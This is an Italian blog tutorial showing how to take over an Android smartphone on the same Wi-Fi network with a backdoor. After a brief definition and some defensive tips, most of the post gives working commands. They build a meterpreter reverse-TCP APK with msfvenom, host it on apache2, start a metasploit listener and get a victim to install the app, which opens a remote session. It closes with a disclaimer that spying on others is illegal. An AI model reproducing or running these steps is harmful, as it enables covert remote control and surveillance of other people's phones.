Cerca nel blog

Accedere ad uno smartphone Android con una backdoor

In questa guida voglio mostrarvi passo-passo come accedere ad uno smartphone Android connesso alla stessa rete wifi, con una backdoor, vi informo che questo metodo è un metodo molto vecchio, che permette attraverso la creazione di un virus informatico di accedere e avere il controllo di uno smartphone Android. Ovviamente la tecnica che viene mostrata è rilevata da moltissimi antivirus presenti in circolazione. Per eseguire questa procedura occorre essere in possesso di una distribuzione Linux con all'interno il software metasploit. Consiglio o Kali-linux o Parrot-Security. Se siete alla vostra prima esperienza e non sapete come avviare distribuzioni di linux vi consiglio di leggere questa guida> Installare Linux su USB.




Cos'è una backdoor?

In informatica la backdoor è un tipo di accesso a un sistema informatico che consente ad un utente remoto o malintenzionato di agire di nascosto al dispositivo in uso. Nella maggior parte dei casi la backdoor viene sviluppata da uno sviluppatore con conoscenza di linguaggio di programmazione molto avanzate. La maggior parte dei casi le backdoor sono sviluppate in maniera del tutto invisibile ai comuni antivirus che possediamo noi oggi.

Come ci si può difendere?

Prima di tutto utilizzare il dispositivo che sia un computer o uno smartphone con le dovute precauzione, evitare di scaricare applicazioni da fonti non ufficiali come per esempio  scaricate da internet, evitare di aprire link che possono sembrare sospetti, evitate di aprire email contenenti programmi o file da email che non provengono dai vostri contatti. Un altro consiglio non credete a tutto ciò che leggete all'interno di uno smartphone che sia un email o un semplice SMS, perché i criminali sono sempre dietro le porte di tutti e tentano di fregarvi in questo modo. Tenete sempre un antivirus aggiornato all'interno del dispositivo se possibile con antivirus con funzionalità avanzate come per esempio un antivirus a pagamento, certo non sempre può bastare però è sempre consigliato tenere un dispositivo comunque con le protezioni più adatte.


Installazione:

Il primo passaggio da effettuare una volta caricato il nostro sistema operativo e quello di aprire il terminale  scrivere il seguente comando:

sudo ifconfig

questo comando ci permette di sapere qual'è il nostro indirizzo ip interno del computer in uso nel mio caso è il seguente: 192.168.0.133



Sempre nel terminale ora dobbiamo andare a creare la backdoor quindi digitiamo:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.133 LPORT=4444  -o /home/kali/Desktop/payloads.apk


Nel vostro caso nel campo LHOST dovete specificare il vostro indirizzo ip.

-p sta ad indicare il payload che andremo a scegliere nel caso nostro abbiamo scelto android/meterpreter/reverse_tcp

-o indica il percorso di destinazione della nostra backdoor, io lo chiamato payloads.apk ma il nome potete scegliere uno qualunque.



Come si può notare dall'immagine la backdoor risulta salvata nel desktop. Adesso occorrerà andare a installare la backdoor nello smartphone, per farlo utilizzeremo apache2 che è presente sia in kali che in parrot. Quindi ora nel terminale scriviamo:

service apache2 start

Adesso non ci resta che caricare la nostra backdoor nella cartella di apache2 per farlo occorre copiare la backdoor con questo comando:

sudo cp /home/kali/Desktop/payloads.apk /var/www/html/payloads.apk

Eseguito anche questo passaggio occorre ora aprire il terminale e avviare metasploit per farlo scriviamo questo comando:

sudo msfconsole

Successivamente scriviamo:

use multi/handler


Poi:

set payloads android/meterpreter/reverse_tcp



Poi impostiamo l'indirizzo ip e la porta precedentemente utilizzati:

set LHOST 192.168.0.133

set LPORT 4444


Successivamente avviamo l'exploit con il seguente comando:

exploit


Ora procediamo con l'installazione dell'applicazione sullo smartphone della vittima, per farlo occorre scrivere sulla barra degli indirizzi di navigazione il seguente comando:


http://192.168.0.133/payloads.apk

Inizierà a partire un download dell'applicazione, abilitate le sorgenti sconosciute, e installate l'applicazione, appena apriremo l'applicazione noteremo la sessione attiva sul terminale di metasploit.


Ora per aprire la sessione e iniziare a navigare all'interno dello smartphone occorre scrivere nel terminale:

session -l 

successivamente selezionare la sessione in esecuzione

sessions -i 1

ora scrivete help per vedere tutti i comandi da sfruttare nel terminale.

Vi lascio un piccolo video su una intercettazione fatta con questa tecnica, ovviamente la persona che parla è un mio famigliare ed è a conoscenza della intercettazione. Questa guida è a scopo illustrativo o per testare il proprio dispositivo, spiare uno smartphone altrui è un reato, io non mi assumo nessuna responsabilità dell'utilizzo che farete della guida. 




PREMESSA:









0 commenti:

Posta un commento

Post piu Popolari